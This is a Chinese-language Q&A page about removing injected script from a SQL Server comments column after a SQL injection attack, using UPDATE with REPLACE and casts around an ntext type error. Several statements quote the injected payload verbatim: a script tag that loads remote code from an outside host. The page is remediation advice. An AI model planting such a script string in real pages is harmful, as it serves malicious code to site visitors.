0
我主持的網站最近是SQL注入的,我想找到一種方法從數據庫中的特定列(註釋)中刪除有問題的注入代碼。使用SQL Server 2008,我不知道這是爲什麼不工作:從表列刪除部分文本
USE Dirty
SELECT REPLACE(comments,'</title><script src=http://hjfghj.com/r.php ></script>','')
FROM SALONS
A
回答
3
你只是選擇 - 不更新....
試試這個:
USE Dirty
UPDATE dbo.Salons
SET Comments = REPLACE(comments,'</title><script src=http://hjfghj.com/r.php ></script>','')
WHERE (possibly a condition here...)
+1
打我4秒! – msmucker0527 2012-03-08 21:48:25
+0
得到:Msg 8116,Level 16,State 1,Line 3 參數數據類型ntext對替換函數的參數1無效。 – user547794 2012-03-08 21:50:12
+1
您應該使用nvarchar(max)而不是ntext作爲列時間。 (請參閱http://msdn.microsoft.com/en-us/library/ms187993.aspx)根據您處理ntext列的方式,您可能必須更改相當多的代碼,但這將是值得的。 – 2012-03-08 22:33:24
2
你實際上沒有更新任何東西,只是選擇它。您需要創建更新聲明
USE Dirty
UPDATE SALONS
SET comments = REPLACE(comments,'</title><script src=http://hjfghj.com/r.php ></script>','')
+0
我收到了:消息8116,級別16,狀態1,行3 參數數據類型ntext對於替換函數的參數1無效。 – user547794 2012-03-08 21:51:03
-1
因爲列是導致錯誤的「ntext」。我設法解決這個使用像這樣的演員:
USE Dirty
UPDATE dbo.Salons
SET Comments = cast(replace(cast(comments as varchar(8000)),'</title><script src=http://hjfghj.com/r.php ></script>','') as ntext)
+0
如果你這樣做 - 確保轉換爲'NVARCHAR(MAX)'!!!!否則,您將您的評論限制爲8000個字符,並且您將它們轉換回非Unicode! – 2012-03-09 05:55:07
相關問題
- 1. jquery部分刪除文本
- 2. 刪除jQuery中的部分文本
- 3. LINUX從文件中刪除文本部分與sed基於
- 4. C++從列表中部刪除節點
- 5. 從URL中刪除部分
- 6. 從列表項中刪除分號
- 7. 刪除部分文件名
- 8. 從沒有唯一列的表中刪除部分重複項
- 9. 從部分字符串中刪除文本
- 10. 從bash腳本中刪除du輸出的文件部分
- 11. 通過jQuery從部分文本中刪除冒號?
- 12. 如何從iOS Swift 3中的餅圖部分刪除文本?
- 13. SQL查詢刪除整個表中的文本部分
- 14. 刪除部分
- 15. 刪除部分
- 16. 刪除部分
- 17. 刪除部分
- 18. 從懸停文本中刪除列名
- 19. 刪除文本分號
- 20. 從列表中刪除文件名python
- 21. 從python列表中刪除外部列表
- 22. 從其底部的文本中刪除填充文本
- 23. 刪除文件並從列表中刪除它的名字
- 24. INI4J - 刪除部分
- 25. 刪除部分行
- 26. 刪除對象從列表
- 27. 從列表中刪除todoItem
- 28. 從列表中刪除nan
- 29. 從SQLite表中刪除列
- 30. 從列表中刪除
什麼** datatype **是'評論'?? – 2012-03-08 21:46:25